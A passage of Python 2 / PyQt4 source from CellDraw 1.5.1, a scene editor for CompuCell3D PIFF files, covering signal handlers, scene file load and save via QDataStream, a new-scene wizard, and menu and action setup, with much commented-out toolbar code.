self.windowPIFControlPanel.setImageSequenceImageUnitsLabel(lDict[3])\n\n\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: moving to a MVC design, TODO:\n # this connect signal handler should go to the Controller object!\n #\n # handleImageSequenceIndexSet() responds to signalThatCurrentIndexSet changes\n # ------------------------------------------------------------\n def handleImageSequenceIndexSet(self, pDict):\n lDict = dict(pDict)\n self.windowPIFControlPanel.setImageSequenceCurrentIndex(lDict[0])\n self.windowPIFControlPanel.setImageSequenceCurrentFilename(lDict[1])\n\n\n\n\n # ------------------------------------------------------------------\n # 2011 Mitja - slot method handling \"signalSelectedImageInSequenceHasChanged\" events\n # (AKA signals) arriving from the object theControlsForImageSequence\n # 
------------------------------------------------------------------\n    def handleSelectedImageWithinSequenceChanged(self, pSelectedImage):\n\n        if isinstance(self.scene.theImageSequence, CDImageSequence) == True:\n            self.scene.theImageSequence.setCurrentIndexInSequence( pSelectedImage )\n\n        self.scene.update()\n\n        CDConstants.printOut( " handleSelectedImageWithinSequenceChanged() - self.scene.theImageSequence.getCurrentIndex() = "+str(self.scene.theImageSequence.getCurrentIndex()) , CDConstants.DebugExcessive )\n\n\n    # ------------------------------------------------------------------\n    # 2011 Mitja - slot method handling "signalImageSequenceProcessingModeHasChanged" events\n    #   (AKA signals) arriving from the object theControlsForImageSequence\n    # ------------------------------------------------------------------\n    def handleAreaOrEdgeModeHasChanged(self, pMode):\n        \n        CDConstants.printOut( " handleAreaOrEdgeModeHasChanged() str(type(pMode))==["+str(type(pMode))+"]" , CDConstants.DebugTODO )\n        CDConstants.printOut( " str(type(pMode).__name__)==["+str(type(pMode).__name__)+"]" , CDConstants.DebugTODO )\n        CDConstants.printOut( " str(pMode)==["+str(pMode)+"]" , CDConstants.DebugTODO )\n        # bin() does not exist in Python 2.5, only use it on 2.6 and newer:\n        if sys.version_info >= (2, 6) :\n            CDConstants.printOut( " str(bin(int(pMode)))==["+str(bin(int(pMode)))+"]" , CDConstants.DebugTODO )\n        else:\n            CDConstants.printOut( " str(int(pMode))==["+str(int(pMode))+"]" , CDConstants.DebugTODO )\n\n        if ( isinstance(self.scene.theImageSequence, CDImageSequence) == True ):\n            # go and tell the image sequence in what mode it is now:\n            self.scene.theImageSequence.assignAllProcessingModesForImageSequenceToPIFF( pMode )\n            self.scene.update()\n\n# \n# TODO:\n# \n# Traceback (most recent call last):\n#   File "/Volumes/30G/Users/mitja/Desktop/CellDraw/CellDraw/1.5.1/src/cdDiagramScene.py", line 3026, in handleAreaOrEdgeModeHasChanged\n#     CDConstants.printOut( " handleAreaOrEdgeModeHasChanged - self.scene.theImageSequence.assignAllProcessingModesForImageSequenceToPIFF( "+str(bin(pMode))+") " , CDConstants.DebugExcessive )\n# TypeError: bin(QTextStream): argument 1 has unexpected type 'int'\n# \n# \n\n        # bin() does not exist in Python 2.5, only use it on 2.6 and newer:\n        if sys.version_info >= (2, 6) :\n            CDConstants.printOut( " handleAreaOrEdgeModeHasChanged() called self.scene.theImageSequence.assignAllProcessingModesForImageSequenceToPIFF( "+str(bin(pMode))+") complete." , CDConstants.DebugExcessive )\n        else:\n            CDConstants.printOut( " handleAreaOrEdgeModeHasChanged() called self.scene.theImageSequence.assignAllProcessingModesForImageSequenceToPIFF( "+str(pMode)+") complete." , CDConstants.DebugExcessive )\n\n\n\n\n\n\n\n\n\n\n    # ------------------------------------------------------------\n    # 2011 - Mitja: add code for loading an entire scene from a saved .pifScene file:\n    #  ( file handling in PyQt inspired by:\n    #    "mi_pyqt/examples/mainwindows/application/application.py" )\n    # ------------------------------------------------------------\n\n\n    # ------------------------------------------------------------\n    def newSceneFile(self):\n#         lUserChoice = QtGui.QMessageBox.warning(self, "CellDraw",\n#                 "Do you want to delete your current Cell Scene, Types, and Regions?",\n#                 QtGui.QMessageBox.Save | QtGui.QMessageBox.Discard |\n#                 QtGui.QMessageBox.Cancel)\n        lNewSceneMessageBox = QtGui.QMessageBox(self)\n        lNewSceneMessageBox.setWindowModality(QtCore.Qt.WindowModal)\n        
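# set up the confirmation dialog before running it modally: warning icon, main and informative texts, and Save/Discard/Cancel buttons:\n        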
lNewSceneMessageBox.setIcon(QtGui.QMessageBox.Warning)\n        # the "setText" sets the main large text in the dialog box:\n        lNewSceneMessageBox.setText("The current Cell Scene, Types and Regions will be discarded.")\n        # the "setInformativeText" sets a smaller text, below the main large text in the dialog box:\n        lNewSceneMessageBox.setInformativeText("Do you want to save your changes?")\n        lNewSceneMessageBox.setStandardButtons(QtGui.QMessageBox.Save | QtGui.QMessageBox.Discard |\n                QtGui.QMessageBox.Cancel)\n        lNewSceneMessageBox.setDefaultButton(QtGui.QMessageBox.Cancel)\n        lUserChoice = lNewSceneMessageBox.exec_()\n\n        if lUserChoice == QtGui.QMessageBox.Save:\n            QtGui.QMessageBox.warning(self, "CellDraw", \\n                "Automatic cc3s SAVE yet to be implemented...\\n" + \\n                "Please save manually, then try New Scene again.")\n            return False\n        elif lUserChoice == QtGui.QMessageBox.Cancel:\n            # if the user hits "esc" or presses the "Cancel" button,\n            #   there's nothing to be done:\n            return False\n        elif lUserChoice == QtGui.QMessageBox.Discard:\n            # ------------------------------------------------------------\n            # bring up the New Scene assistant AKA wizard\n            lAssistant = CDSceneAssistant()\n            \n            # read some persistent-value globals from the preferences file on disk, if it already exists.\n            self.cdPreferences.readPreferencesFromDisk()\n            self.cdPreferences.readCC3DPreferencesFromDisk()\n            lTheColorTable = self.cdPreferences.populateCellColors()\n            lTheColorDict = self.cdPreferences.getCellColorsDict()\n            \n            lAssistant.setPreferencesObject(self.cdPreferences)\n            \n            lAssistant.addPage(lAssistant.createIntroPage(lTheColorTable))\n            lAssistant.addPage(lAssistant.createCellTypePage(lTheColorDict))\n            lAssistant.addPage(lAssistant.createRegionTypePage())\n            \n            lAssistant.show()\n            lAssistant.raise_()\n            lAssistant.exec_()\n            \n            # ------------------------------------------------------------\n            \n        else:\n            lCriticalErrorWarning = QtGui.QMessageBox.critical( self, \\n                "CellDraw", \\n                "Critical error -4554073.\\n\\n" + \\n                "Please contact your system administrator or the source where you obtained CellDraw." )\n            sys.exit()\n\n        CDConstants.printOut( "___ - DEBUG ----- CDDiagramSceneMainWidget: newSceneFile(): done.", CDConstants.DebugExcessive )\n        #\n        # end of def newSceneFile(self)\n        # ------------------------------------------------------------\n\n\n\n    # ------------------------------------------------------------\n    def openSceneFile(self, pFileName):\n        # TODO: for smoother user feedback, implement a "modified" bit\n        #   to only allow saving when a scene actually contains unsaved content.\n        # self.scene.setModified(False)\n#         if self.maybeSave():\n#             fileName = QtGui.QFileDialog.getOpenFileName(self)\n#             if fileName:\n#                 self.loadScenePIFDataFromFile(fileName)\n        self.loadScenePIFDataFromFile(pFileName)\n\n    # ------------------------------------------------------------\n    def loadScenePIFDataFromFile(self, pFileName):\n        CDConstants.printOut( "2011 DEBUG: loadScenePIFDataFromFile("+str(pFileName)+") starting.", CDConstants.DebugExcessive )\n        lQFileForReading = QtCore.QFile(pFileName)\n        if not lQFileForReading.open(QtCore.QFile.ReadOnly):\n            QtGui.QMessageBox.warning(self, "CellDraw",\n                    "Cannot read file:\\n%s\\n%s." % (pFileName, lQFileForReading.errorString()))\n            return False\n\n        lDataStream = QtCore.QDataStream(lQFileForReading)\n\n\n        lHowManyItems = 
lDataStream.readQVariant().toInt()[0]\n\n for i in xrange(lHowManyItems) :\n\n # read from the datastream:\n lSelectedItemPosition = lDataStream.readQVariant().toPointF()\n lSelectedItemColor = QtGui.QColor(lDataStream.readQVariant()) \n # a bit counterintuitively, the toInt() and toFloat() functions DON'T return\n # ints or floats... they return couples of values. So we grab the first ones:\n lSelectedItemRegionOrCell = lDataStream.readQVariant().toInt()[0]\n lSelectedItemType = lDataStream.readQVariant().toInt()[0]\n lSelectedItemScaleX = lDataStream.readQVariant().toFloat()[0]\n lSelectedItemScaleY = lDataStream.readQVariant().toFloat()[0]\n lSelectedItemZValue = lDataStream.readQVariant().toFloat()[0]\n \n lListOfPointsX = lDataStream.readQVariant().toList()\n lListOfPointsY = lDataStream.readQVariant().toList()\n# CDConstants.printOut( \" \"+str( \"LOAD: lListOfPointsX =\", lListOfPointsX )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lListOfPointsY =\", lListOfPointsY )+\" \", CDConstants.DebugTODO )\n lLengthX = len(lListOfPointsX)\n lLengthY = len(lListOfPointsY)\n if lLengthX == lLengthY:\n pass\n else:\n CDConstants.printOut(\"LOAD: received INCONSISTENT paste data! Can't paste.\", CDConstants.DebugTODO )\n return\n\n\n lSelectedItemPolygon = QtGui.QPolygonF()\n # CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemPolygon =\", lSelectedItemPolygon )+\" \", CDConstants.DebugTODO )\n\n\n for i in xrange(lLengthX):\n # CDConstants.printOut( \" \"+str( \"LOAD: lListOfPointsX[i].toFloat() = \", lListOfPointsX[i].toFloat() )+\" \", CDConstants.DebugTODO )\n # CDConstants.printOut( \" \"+str( \"LOAD: lListOfPointsY[i].toFloat() = \", lListOfPointsX[i].toFloat() )+\" \", CDConstants.DebugTODO )\n lPointF = QtCore.QPointF(lListOfPointsX[i].toFloat()[0], lListOfPointsY[i].toFloat()[0])\n # CDConstants.printOut( \" \"+str( \"LOAD: lPointF =\", lPointF )+\" \", CDConstants.DebugTODO )\n lSelectedItemPolygon.append(lPointF)\n\n\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemPosition =\", lSelectedItemPosition )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemColor =\", lSelectedItemColor )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemRegionOrCell =\", lSelectedItemRegionOrCell )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemType =\", lSelectedItemType )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemScaleX =\", lSelectedItemScaleX )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemScaleY =\", lSelectedItemScaleY )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemZValue =\", lSelectedItemZValue )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \"LOAD: lSelectedItemPolygon =\", lSelectedItemPolygon )+\" \", CDConstants.DebugTODO )\n\n # convert the polygon we've constructed from pasted QPointF values\n # into a QPainterPath which can be digested by the DiagramItem constructor:\n lPath = QtGui.QPainterPath()\n lPath.addPolygon(lSelectedItemPolygon)\n lTheNewItem = DiagramItem(lPath, self.scene.myItemMenu)\n # set the new item's color i.e. brush value:\n lTheNewItem.setBrush(lSelectedItemColor)\n\n # 2011 - Mitja: the new item is a region of cells or a single cell:\n lTheNewItem.setRegionOrCell(lSelectedItemRegionOrCell)\n\n # finally, place the newly built item, i.e. 
\"paste\" it into the Cell Scene:\n self.scene.addItem(lTheNewItem)\n\n # to provide the default behavior of having the new item selected,\n # first unselect all selected items in the scene:\n for anItem in self.scene.selectedItems():\n anItem.setSelected(False)\n # then select the newly created item:\n lTheNewItem.setSelected(True)\n\n # emit our own signal to the handler which does other GUI adjustments\n # whenever a new signal is inserted:\n self.scene.signalThatItemInserted.emit(lTheNewItem)\n\n # position the new item in the scene:\n lTheNewItem.setPos(lSelectedItemPosition)\n lTheNewItem.setZValue(lSelectedItemZValue)\n \n # set the same size transformation to the pasted item as it had from the copied/cut one:\n lTheNewItem.myScaleX = lSelectedItemScaleX\n lTheNewItem.myScaleY = lSelectedItemScaleY\n # using QTransform, we first create a transformation, then we apply it to the item:\n lTransform = QtGui.QTransform()\n lTransform.scale( lTheNewItem.myScaleX, lTheNewItem.myScaleY )\n lTheNewItem.setTransform( lTransform )\n \n # 2011 - Mitja: after setting the pasted item's color (AKA brush)\n # also update the scene's regionUseDict since it contains the list of all\n # region colors in use by our scene:\n self.scene.addToRegionColorsInUse(lSelectedItemColor)\n\n\n lQFileForReading.close()\n self.setCurrentFile(pFileName)\n self.parentWindow.setStatusTip(\"Cell Scene read from file %s\" % pFileName)\n return True\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: add code for saving an entire scene to a .pifScene file:\n # ( file handling in PyQt inspired by:\n # \"mi_pyqt/examples/mainwindows/application/application.py\" )\n # ------------------------------------------------------------\n\n # TODO: for smoother user feedback, implement a \"modified\" bit\n # to only allow saving when a scene actually contains unsaved content.\n # self.scene.setModified(False)\n# def maybeSave(self):\n# if self.textEdit.document().isModified():\n# ret = QtGui.QMessageBox.warning(self, \"CellDraw\",\n# \"Do you want to save your current Scene?\",\n# QtGui.QMessageBox.Save | QtGui.QMessageBox.Discard |\n# QtGui.QMessageBox.Cancel)\n# if ret == QtGui.QMessageBox.Save:\n# return self.save()\n# elif ret == QtGui.QMessageBox.Cancel:\n# return False\n# return True\n\n # ------------------------------------------------------------\n def setCurrentFile(self, pFileName):\n self.curFile = pFileName\n # TODO: for smoother user feedback, implement a \"modified\" bit\n # to only allow saving when a scene actually contains unsaved content.\n # self.scene.setModified(False)\n self.setWindowModified(False)\n\n if self.curFile:\n shownName = self.strippedName(self.curFile)\n else:\n shownName = 'untitled.pifScene'\n\n self.setWindowTitle(\"%s[*] - CellDraw\" % shownName)\n\n def strippedName(self, fullFileName):\n return QtCore.QFileInfo(fullFileName).fileName()\n\n # ------------------------------------------------------------\n def saveSceneFile(self):\n if self.curFile:\n lFileSaved = self.saveScenePIFDataToFile(self.curFile)\n else:\n lFileSaved = self.saveAs()\n return lFileSaved\n\n # ------------------------------------------------------------\n def saveAs(self):\n\n # 2011 - Mitja: setup local variables for file saving:\n lToBeSavedFileExtension = QtCore.QString(\"pifScene\")\n lToBeSavedInitialPath = QtCore.QDir.currentPath() + self.tr(\"/untitled.\") + lToBeSavedFileExtension\n\n lFileName = QtGui.QFileDialog.getSaveFileName(self, self.tr(\"CellDraw - Save Scene As\"),\n 
lToBeSavedInitialPath,\n                self.tr("%1 files (*.%2);;All files (*)")\n                    .arg(lToBeSavedFileExtension)\n                    .arg(lToBeSavedFileExtension))\n\n        if lFileName:\n            lFileSaved = self.saveScenePIFDataToFile(lFileName)\n        else:\n            lFileSaved = False\n        return lFileSaved\n\n    # ------------------------------------------------------------\n    def saveScenePIFDataToFile(self, pFileName):\n        lAllItems = self.scene.items()\n        lHowManyItems = len(lAllItems)\n\n        CDConstants.printOut( str(lHowManyItems) + ", " + str(lAllItems) + " ", CDConstants.DebugTODO )\n\n        # make sure that there is at least one item in the scene:\n        if not lAllItems:\n            CDConstants.printOut("#=#=#=#=#=#=#=# saveScenePIFDataToFile() lAllItems = " + str(lAllItems), CDConstants.DebugTODO )\n            print\n            CDConstants.printOut("there is NOTHING in your Cell Scene!!!", CDConstants.DebugTODO )\n            print\n            return\n\n\n        lQFileForWriting = QtCore.QFile(pFileName)\n        if not lQFileForWriting.open(QtCore.QFile.WriteOnly):\n            QtGui.QMessageBox.warning(self, "CellDraw",\n                    "Cannot write file %s.\\nError: %s." % (pFileName, lQFileForWriting.errorString()))\n            return False\n\n        # if we wrote into memory first, we'd create an empty byte array:\n        # lItemDataByteArray = QByteArray()\n\n        # open a data stream that can write *not* to the new byte array,\n        #   but to the file we just opened:\n        # lDataStream = QtCore.QDataStream(lItemDataByteArray, QtCore.QIODevice.WriteOnly)\n        lDataStream = QtCore.QDataStream(lQFileForWriting)\n        \n        # first, write how many items we have,\n        #   for easier loading when reopening the file:\n        lDataStream.writeQVariant(lHowManyItems)\n\n        # extract all the necessary data for *each* scene item individually:\n        for lAnItem in lAllItems:\n            # get all the necessary information from the item:\n            lSelectedItemPosition = lAnItem.scenePos()\n            lSelectedItemColor = lAnItem.brush().color()\n            lSelectedItemRegionOrCell = lAnItem.itsaRegionOrCell\n            lSelectedItemType = lAnItem.diagramType\n            lSelectedItemScaleX = lAnItem.myScaleX\n            lSelectedItemScaleY = lAnItem.myScaleY\n            lSelectedItemZValue = lAnItem.zValue()\n            lSelectedItemPolygon = lAnItem.polygon()\n            lPointListX = [] \n            lPointListY = [] \n            for lPointF in lSelectedItemPolygon:\n                lPointListX.append(lPointF.x())\n                lPointListY.append(lPointF.y())\n\n            # write into the QDataStream just opened above:\n            #   the order in which data is written is important!!!\n            lDataStream.writeQVariant(lSelectedItemPosition)\n            lDataStream.writeQVariant(lSelectedItemColor)\n            lDataStream.writeQVariant(lSelectedItemRegionOrCell)\n            lDataStream.writeQVariant(lSelectedItemType)\n            lDataStream.writeQVariant(lSelectedItemScaleX)\n            lDataStream.writeQVariant(lSelectedItemScaleY)\n            lDataStream.writeQVariant(lSelectedItemZValue)\n            lDataStream.writeQVariant(lPointListX)\n            lDataStream.writeQVariant(lPointListY)\n\n        # we could place the byte array into a mime data container?\n        # lMimeData = QtCore.QMimeData()\n        # lMimeData.setData('application/x-pif-scene', lItemDataByteArray)\n\n        lQFileForWriting.close()\n        self.setCurrentFile(pFileName)\n        self.parentWindow.setStatusTip("Cell Scene written to file %s" % pFileName)\n        return True\n\n\n    # ------------------------------------------------------------\n    def about(self):\n        \n        lAboutString = "CellDraw 1.5.1
\\n\\nAn editing and conversion software tool for PIFF files, as used in CompuCell3D simulations.\\n\\nCellDraw can be useful for creating PIFF files containing a high number of cells and cell types, either by drawing a scene containing cell regions in a paint program, and then discretize the drawing into a PIFF file, or by drawing the cell scenario directly in CellDraw.\\n\\nMore information at:\\nhttp://www.compucell3d.org/"\n\n        lVersionString = "\\n\\nSupport library information:\\nPython runtime version: %s\\nQt runtime version: %s\\nQt compile-time version: %s\\nPyQt version: %s (%s = 0x%06x)\\n
\" % \\\n ( str(sys.version_info[0])+\".\"+str(sys.version_info[1])+\".\"+str(sys.version_info[2])+\" | \"+str(sys.version_info[3])+\" | \"+str(sys.version_info[4]) , \\\n QtCore.QT_VERSION_STR, QtCore.qVersion(), PyQt4.QtCore.PYQT_VERSION_STR, PyQt4.QtCore.PYQT_VERSION, PyQt4.QtCore.PYQT_VERSION)\n\n QtGui.QMessageBox.about(self, \"About CellDraw\", lAboutString+lVersionString)\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: connectSignals() contains all signal<->handler(AKA slot)\n # connections for the CDDiagramSceneMainWidget class:\n # ------------------------------------------------------------\n def connectSignals(self):\n\n # connect signals in other objects to this class' methods:\n self.scene.signalThatItemInserted.connect(self.handlerForItemInserted)\n self.scene.signalThatTextInserted.connect(self.handlerForTextInserted)\n self.scene.signalThatItemSelected.connect(self.handlerForItemSelected)\n\n self.scene.signalThatItemResized.connect(self.handlerForItemResized)\n\n self.scene.signalThatSceneResized.connect(self.handlerForSceneResized)\n\n\n self.scene.theImageLayer.signalThatMouseMoved.connect(self.handlerForMouseMoved)\n\n\n # signal<->handler(AKA slot) connections, connect signals to this class' methods:\n self.theCDImageSequence.signalThatImageSequenceResized.connect( \\\n self.handleImageSequenceResized )\n\n # signal<->handler(AKA slot) connections, connect signals to this class' methods:\n self.theCDImageSequence.signalThatCurrentIndexSet.connect( \\\n self.handleImageSequenceIndexSet )\n\n\n\n # 2011 - Mitja: connect the sender (i.e. self.theCDImageLayer) object's signal\n # (i.e. \"mousePressedInImageLayerSignal()\" in CDImageLayer's mousePressEvent() ),\n # to the receiver fuction (i.e. handleMousePressedInImageLayerSignal() here.) 
:\n self.connect( self.theCDImageLayer, \\\n QtCore.SIGNAL(\"mousePressedInImageLayerSignal()\"), \\\n self.handleMousePressedInImageLayerSignal )\n\n # you can use this syntax instead of the 'old' one:\n self.mysignal.connect(self.myslot)\n\n # but this will also work\n self.connect(self, QtCore.SIGNAL('mysignal(QString)'), self.myslot)\n\n self.mysignal.emit(\"hello\")\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: myslot is a test handler (AKA slot) for signals:\n # ------------------------------------------------------------\n def myslot(self, param):\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n CDConstants.printOut(\"received %s\" % param , CDConstants.DebugTODO )\n\n\n\n\n\n # ------------------------------------------------------------\n\n\n # ------------------------------------------------------------\n def createButtonGroupForRegionShapes(self):\n lButtonGroup = QtGui.QButtonGroup()\n lButtonGroup.setExclusive(False)\n lButtonGroup.buttonClicked[int].connect(self.handlerForButtonGroupRegionShapesClicked)\n return lButtonGroup\n\n\n # ------------------------------------------------------------\n def createButtonGroupForBackgrounds(self):\n lButtonGroup = QtGui.QButtonGroup()\n lButtonGroup.buttonClicked.connect(self.handlerForButtonGroupBackgroundsClicked)\n return lButtonGroup\n\n\n\n\n\n\n\n\n\n # ------------------------------------------------------------\n def createSceneEditActions(self):\n\n # Note: PyQt 4.8.6 seems to have problems with assigning the proper key shortcuts\n # using mnemonics such as:\n # shortcut=QtGui.QKeySequence.Cut\n # shortcut=QtGui.QKeySequence.Copy\n # shortcut=QtGui.QKeySequence.Paste\n # so we have to set the shortcuts explicitly to \"Ctrl+key\" ...\n \n self.cutAction = QtGui.QAction(\n QtGui.QIcon(':/icons/cutRegion.png'), \"Cut\", self,\n shortcut=\"Ctrl+X\", statusTip=\"Cut a region from the Cell Scene\",\n triggered=self.cutItem)\n\n self.copyAction = QtGui.QAction(\n QtGui.QIcon(':/icons/copyRegion.png'), \"Copy\", self,\n shortcut=\"Ctrl+C\", statusTip=\"Copy a region from the Cell Scene\",\n triggered=self.copyItem)\n\n self.pasteAction = QtGui.QAction(\n QtGui.QIcon(':/icons/pasteRegion.png'), \"Paste\", self,\n shortcut=\"Ctrl+V\", statusTip=\"Paste a region to the Cell Scene\",\n triggered=self.pasteItem)\n\n # Another cross-platform Qt messy implementation: according to Qt documentation,\n # 
the \"Delete\" shortcut maps to the \"Del\" button on Mac OS X.\n # But on Mac OS X there is NO \"Del\" button: there are the \"Delete\" button\n # and the \"forward delete\" button. To obtain correct behavior, we therefore have\n # to use the \"Backspace\" Qt shortcut, which maps to the \"Delete\" button on Mac OS X.\n # Qt continuously exhibits poorly implemented cross-platform functionalities.\n if sys.platform=='darwin':\n self.deleteAction = QtGui.QAction(QtGui.QIcon(':/icons/deleteRegion.png'),\n \"&Delete\", self, shortcut=\"Backspace\",\n statusTip=\"Delete a region from the Cell Scene\",\n triggered=self.deleteItem)\n else:\n self.deleteAction = QtGui.QAction(QtGui.QIcon(':/icons/deleteRegion.png'),\n \"&Delete\", self, shortcut=\"Delete\",\n statusTip=\"Delete a region from the Cell Scene\",\n triggered=self.deleteItem)\n\n self.toFrontAction = QtGui.QAction(\n QtGui.QIcon(':/icons/bringtofront.png'), \"Bring to &Front\",\n self, shortcut=\"Ctrl+F\", statusTip=\"Bring a region to the front of the Cell Scene\",\n triggered=self.bringToFront)\n\n self.sendBackAction = QtGui.QAction(\n QtGui.QIcon(':/icons/sendtoback.png'), \"Send to &Back\", self,\n shortcut=\"Ctrl+B\", statusTip=\"Send a region to the back of the Cell Scene\",\n triggered=self.sendToBack)\n\n\n # 2010 - Mitja: one more cross-platform Qt messup:\n # since when is Ctrl-X a standard cross-platform shortcut for quitting an application???\n # 2010 - Mitja: GUI simplification: hide all that's not necessary to Cell Scene editing:\n # in this case don't create the exitAction, it's redundant:\n # self.exitAction = QtGui.QAction(\"E&xit\", self, shortcut=\"Ctrl+X\",\n # statusTip=\"Quit Scenediagram example\", triggered=self.close)\n\n self.boldAction = QtGui.QAction(QtGui.QIcon(':/icons/bold.png'),\n \"Bold\", self, checkable=True, shortcut=\"Ctrl+B\",\n triggered=self.handleFontChange)\n\n self.italicAction = QtGui.QAction(QtGui.QIcon(':/icons/italic.png'),\n \"Italic\", self, checkable=True, shortcut=\"Ctrl+I\",\n triggered=self.handleFontChange)\n\n self.underlineAction = QtGui.QAction(\n QtGui.QIcon(':/icons/underline.png'), \"Underline\", self,\n checkable=True, shortcut=\"Ctrl+U\",\n triggered=self.handleFontChange)\n\n self.aboutAction = QtGui.QAction(\"About\", self, \\\n shortcut=\"Ctrl+E\", \\\n triggered=self.about)\n\n CDConstants.printOut(\"___ - DEBUG ----- CDDiagramSceneMainWidget: createSceneEditActions() done.\", CDConstants.DebugTODO )\n\n # end of def createSceneEditActions(self)\n # ------------------------------------------------------------\n \n \n\n # ------------------------------------------------------------\n # 2010 - Mitja: is there any real need for menus,\n # when all actions are reachable from toolbars?\n # ------------------------------------------------------------\n def createMenus(self):\n # 2010 - Mitja: GUI simplification: hide all that's not necessary to Cell Scene editing:\n # in this case don't add the fileMenu to the main menubar, it's redundant:\n # self.fileMenu = self.parentWindow.menuBar().addMenu(\"&File\")\n # self.fileMenu.addAction(self.exitAction)\n CDConstants.printOut(str( self.parentWindow ), CDConstants.DebugTODO )\n self.editMenu = self.parentWindow.menuBar().addMenu(\"Edit\")\n self.editMenu.addAction(self.cutAction)\n self.editMenu.addAction(self.copyAction)\n self.editMenu.addAction(self.pasteAction)\n self.editMenu.addAction(self.deleteAction)\n self.editMenu.addSeparator()\n self.editMenu.addAction(self.toFrontAction)\n 
self.editMenu.addAction(self.sendBackAction)\n\n self.windowMenu = self.parentWindow.menuBar().addMenu(\"Window\")\n\n self.aboutMenu = self.parentWindow.menuBar().addMenu(\"Help\")\n self.aboutMenu.addAction(self.aboutAction)\n\n # ------------------------------------------------------------\n# def createToolbars(self):\n\n # 2010 - Mitja: dummy \"Toolbar\" toolbar, it contains nothing, but\n # it seems to be necessary to bypass a Qt bug which prevents the first toolbar\n # added to a parent window from showing up there.\n #\n # self.dummyToolBar = self.parentWindow.addToolBar(\"Toolbar\")\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: \"Color\" toolbar, it's built from 3 pop-up menu buttons,\n # one each for font color, item fill color, and line color.\n # Menu defaults are set here and for consistency they *must* coincide\n # with the defaults set in the DiagramScene class globals:\n # But really only use the item fill color, and we disable the other two:\n #\n #\n# self.fontColorToolButton = QtGui.QToolButton()\n# self.fontColorToolButton.setPopupMode(QtGui.QToolButton.MenuButtonPopup)\n# self.fontColorToolButton.setMenu(\n# self.createColorMenu(self.textColorChanged, QtCore.Qt.red))\n# self.textAction = self.fontColorToolButton.menu().defaultAction()\n# self.fontColorToolButton.setIcon(\n# self.createColorToolButtonIcon(':/icons/textpointer.png',\n# QtCore.Qt.red))\n# self.fontColorToolButton.setAutoFillBackground(True)\n# self.fontColorToolButton.clicked.connect(self.textButtonTriggered)\n# #\n# self.lineColorToolButton = QtGui.QToolButton()\n# self.lineColorToolButton.setPopupMode(QtGui.QToolButton.MenuButtonPopup)\n# self.lineColorToolButton.setMenu(\n# self.createColorMenu(self.lineColorChanged, QtCore.Qt.black))\n# self.lineAction = self.lineColorToolButton.menu().defaultAction()\n# self.lineColorToolButton.setIcon(\n# self.createColorToolButtonIcon(':/icons/linecolor.png',\n# QtCore.Qt.black))\n# self.lineColorToolButton.clicked.connect(self.lineButtonTriggered)\n\n# self.colorToolBar = self.parentWindow.addToolBar(\"Color\")\n # 2010 - Mitja: GUI simplification: hide all that's not necessary to Cell Scene editing:\n # in this case don't add to the colorToolbar the fontColorToolButton and lineColorToolButton button-popup-menus:\n # self.colorToolBar.addWidget(self.fontColorToolButton)\n # self.colorToolBar.addWidget(self.lineColorToolButton)\n # self.colorToolBar.addWidget(self.fillColorToolButton)\n# self.colorToolBar.addAction(self.pifTableAction)\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja: \"Font\" toolbar:\n # (we don't currently use this toolbar in the Cell Scene editor)\n # \n# self.fontCombo = QtGui.QFontComboBox()\n# self.fontCombo.currentFontChanged.connect(self.currentFontChanged)\n# #\n# self.fontSizeCombo = QtGui.QComboBox()\n# self.fontSizeCombo.setEditable(True)\n# for i in range(8, 30, 2):\n# self.fontSizeCombo.addItem(str(i))\n# validator = QtGui.QIntValidator(2, 64, self)\n# self.fontSizeCombo.setValidator(validator)\n# self.fontSizeCombo.currentIndexChanged.connect(self.fontSizeChanged)\n #\n # 2010 - Mitja: GUI simplification: hide all that's not necessary to Cell Scene editing:\n # in this case don't add to the parentWindow the textToolBar for handling text fonts:\n # self.textToolBar = self.parentWindow.addToolBar(\"Font\")\n # just create the QToolBar and hide it, in case not having it would bring havoc to the application!\n# self.textToolBar = QtGui.QToolBar(\"Font\")\n# 
